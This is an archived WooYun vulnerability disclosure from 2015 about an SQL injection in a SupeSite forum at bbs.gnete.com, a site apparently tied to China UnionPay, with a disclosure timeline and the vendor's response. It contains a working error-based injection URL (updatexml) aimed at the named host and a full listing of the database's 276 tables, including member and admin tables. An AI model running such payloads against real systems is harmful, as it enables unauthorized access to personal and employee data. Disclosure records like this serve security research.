当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0109097

漏洞标题:中国某大型金融机构某地区业务SQL注入漏洞(DBA权限可获取员工信息)

相关厂商:中国银联

漏洞作者: 几何黑店

提交时间:2015-04-19 20:58

修复时间:2015-06-08 09:10

公开时间:2015-06-08 09:10

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-19: 细节已通知厂商并且等待厂商处理中
2015-04-24: 厂商已经确认,细节仅向厂商公开
2015-05-04: 细节向核心白帽子及相关领域专家公开
2015-05-14: 细节向普通白帽子公开
2015-05-24: 细节向实习白帽子公开
2015-06-08: 细节向公众公开

简要描述:

中国银联某地区业务SQL注入漏洞(可获取员工信息)

详细说明:

http://bbs.gnete.com
使用了supesite
查找supesite相关漏洞

http://bbs.gnete.com/batch.common.php?action=modelquote&cid=1&name=members%20where%201=1%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(521521)),0x5e24),1))%23


QQ图片20150419180912.png


Database: gnete_bbs
[276 tables]
+----------------------+
| cdb_access |
| cdb_activities |
| cdb_activityapplies |
| cdb_addons |
| cdb_adminactions |
| cdb_admincustom |
| cdb_admingroups |
| cdb_adminnotes |
| cdb_adminsessions |
| cdb_advertisements |
| cdb_announcements |
| cdb_attachmentfields |
| cdb_attachments |
| cdb_attachpaymentlog |
| cdb_attachtypes |
| cdb_banned |
| cdb_bbcodes |
| cdb_caches |
| cdb_creditslog |
| cdb_crons |
| cdb_debateposts |
| cdb_debates |
| cdb_failedlogins |
| cdb_faqs |
| cdb_favoriteforums |
| cdb_favorites |
| cdb_favoritethreads |
| cdb_feeds |
| cdb_forumfields |
| cdb_forumlinks |
| cdb_forumrecommend |
| cdb_forums |
| cdb_imagetypes |
| cdb_invites |
| cdb_itempool |
| cdb_magiclog |
| cdb_magicmarket |
| cdb_magics |
| cdb_medallog |
| cdb_medals |
| cdb_memberfields |
| cdb_membermagics |
| cdb_memberrecommend |
| cdb_members |
| cdb_memberspaces |
| cdb_moderators |
| cdb_modworks |
| cdb_mytasks |
| cdb_navs |
| cdb_onlinelist |
| cdb_onlinetime |
| cdb_orders |
| cdb_paymentlog |
| cdb_pluginhooks |
| cdb_plugins |
| cdb_pluginvars |
| cdb_polloptions |
| cdb_polls |
| cdb_postposition |
| cdb_posts |
| cdb_profilefields |
| cdb_projects |
| cdb_promotions |
| cdb_prompt |
| cdb_promptmsgs |
| cdb_prompttype |
| cdb_ranks |
| cdb_ratelog |
| cdb_regips |
| cdb_relatedthreads |
| cdb_reportlog |
| cdb_request |
| cdb_rewardlog |
| cdb_rsscaches |
| cdb_searchindex |
| cdb_sessions |
| cdb_settings |
| cdb_smilies |
| cdb_spacecaches |
| cdb_stats |
| cdb_statvars |
| cdb_styles |
| cdb_stylevars |
| cdb_tags |
| cdb_tasks |
| cdb_taskvars |
| cdb_templates |
| cdb_threads |
| cdb_threadsmod |
| cdb_threadtags |
| cdb_threadtypes |
| cdb_tradecomments |
| cdb_tradelog |
| cdb_tradeoptionvars |
| cdb_trades |
| cdb_typemodels |
| cdb_typeoptions |
| cdb_typeoptionvars |
| cdb_typevars |
| cdb_usergroups |
| cdb_validating |
| cdb_warnings |
| cdb_words |
| eai_log |
| eai_sms_templet |
| eai_sms_tempvar |
| home_ad |
| home_adminsession |
| home_album |
| home_appcreditlog |
| home_blacklist |
| home_block |
| home_blog |
| home_blogfield |
| home_cache |
| home_class |
| home_click |
| home_clickuser |
| home_comment |
| home_config |
| home_creditlog |
| home_creditrule |
| home_cron |
| home_data |
| home_docomment |
| home_doing |
| home_event |
| home_eventclass |
| home_eventfield |
| home_eventinvite |
| home_eventpic |
| home_feed |
| home_friend |
| home_friendguide |
| home_friendlog |
| home_invite |
| home_log |
| home_magic |
| home_magicinlog |
| home_magicstore |
| home_magicuselog |
| home_mailcron |
| home_mailqueue |
| home_member |
| home_mtag |
| home_mtaginvite |
| home_myapp |
| home_myinvite |
| home_notification |
| home_pic |
| home_picfield |
| home_poke |
| home_poll |
| home_pollfield |
| home_polloption |
| home_polluser |
| home_post |
| home_profield |
| home_profilefield |
| home_report |
| home_session |
| home_share |
| home_show |
| home_space |
| home_spacefield |
| home_spaceinfo |
| home_spacelog |
| home_stat |
| home_statuser |
| home_tag |
| home_tagblog |
| home_tagspace |
| home_task |
| home_thread |
| home_topic |
| home_topicuser |
| home_userapp |
| home_userappfield |
| home_userevent |
| home_usergroup |
| home_userlog |
| home_usermagic |
| home_usertask |
| home_visitor |
| pub_option |
| pub_org |
| pub_sysconfig |
| srv_post |
| ss_adminsession |
| ss_ads |
| ss_announcements |
| ss_attachments |
| ss_attachmenttypes |
| ss_blocks |
| ss_cache |
| ss_cache_0 |
| ss_cache_1 |
| ss_cache_2 |
| ss_cache_3 |
| ss_cache_4 |
| ss_cache_5 |
| ss_cache_6 |
| ss_cache_7 |
| ss_cache_8 |
| ss_cache_9 |
| ss_cache_a |
| ss_cache_b |
| ss_cache_c |
| ss_cache_d |
| ss_cache_e |
| ss_cache_f |
| ss_categories |
| ss_channels |
| ss_click |
| ss_clickgroup |
| ss_clickuser |
| ss_creditlog |
| ss_creditrule |
| ss_crons |
| ss_customfields |
| ss_forums |
| ss_friendlinks |
| ss_members |
| ss_modelcolumns |
| ss_modelfolders |
| ss_modelinterval |
| ss_models |
| ss_pages |
| ss_polls |
| ss_postitems |
| ss_postlog |
| ss_postmessages |
| ss_postset |
| ss_prefields |
| ss_productitems |
| ss_productmessage |
| ss_reports |
| ss_robotitems |
| ss_robotlog |
| ss_robotmessages |
| ss_robots |
| ss_rss |
| ss_servicesitems |
| ss_servicesmessage |
| ss_settings |
| ss_sitemaplogs |
| ss_spacecomments |
| ss_spaceitems |
| ss_spacenews |
| ss_spacepages |
| ss_spacetags |
| ss_styles |
| ss_tagcache |
| ss_tags |
| ss_usergroups |
| ss_userlog |
| ss_words |
| uc_admins |
| uc_applications |
| uc_badwords |
| uc_domains |
| uc_failedlogins |
| uc_feeds |
| uc_friends |
| uc_mailqueue |
| uc_memberfields |
| uc_members |
| uc_mergemembers |
| uc_newpm |
| uc_notelist |
| uc_pms |
| uc_protectedmembers |
| uc_settings |
| uc_sqlcache |
| uc_tags |
| uc_vars |
+----------------------+


QQ图片20150419181538.png


QQ图片20150419152511.png

漏洞证明:

QQ图片20150419181224.png


QQ图片20150419181333.png


修复方案:

你懂的

版权声明:转载请注明来源 几何黑店@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-04-24 09:09

厂商回复:

CNVD未复现所述情况,已经转由CNCERT向银行业信息化主管部门通报,由其后续协调网站管理单位处置.

最新状态:

暂无